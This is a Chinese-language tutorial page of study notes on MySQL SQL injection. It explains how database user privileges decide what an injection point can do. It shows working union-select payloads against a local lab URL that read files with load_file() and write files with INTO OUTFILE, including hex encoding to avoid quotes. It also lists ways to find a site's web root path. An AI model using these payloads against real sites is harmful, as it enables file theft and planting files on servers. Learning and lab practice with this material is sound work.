Sql注入_mysql權限入侵


實驗:測試不同數據庫用戶的操作權限

文件讀寫測試:load_file() ,into outfile

數據庫用戶賬號密碼存儲在mysql.user

Mysql最高權限用戶root

Mysql普通權限用戶test:

 

無權限文件讀寫

 

注入點數據庫用戶權限由什么決定?

連接數據庫用戶決定

Mysql注入點進行文件讀寫操作:

條件:root權限注入點

讀取操作:

http://127.0.0.1/sqlin/mysql/index.php?x=1 union select load_file('d:/www.txt'),2,3


寫入語句:

http://127.0.0.1/sqlin/mysql/index.php?x=1 union  select "a",2,3 into outfile "d:/www1.txt"

 

注意事項:

 

  1. 路徑符號問題

 

使用“/”或 “\\”

 

不使用“\”

 

原因:編程中“\”多半是轉義,如:\n 換行

 

 

 

  1. 編碼問題

http://127.0.0.1/sqlin/mysql/index.php?x=1 union  select "a",2,3 into outfile "d:/www1.txt"

如果要寫入數據中帶有單引號,怎么辦?

編碼解決!(用編碼即不用單引號)

如果要寫入 a'   需要編碼后寫入  小葵 16進制 hex

http://127.0.0.1/sqlin/mysql/index.php?x=1 union  select 0x6127,2,3 into outfile "d:/www1.txt"

 

 

網站路徑獲取方法:

 

  1. 遺留文件

 

一般在網站根目錄下,命名有php.php info.php

 

phpinfo.phptest.php php_info.php等。

 

 

2.報錯顯示

3.漏洞暴路徑

4.讀取搭建平台配置文件

 

 

 

 

 5.谷歌黑客,字典猜解

 

 

D:/www/

D:/wwwroot/

D:/web/

 



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM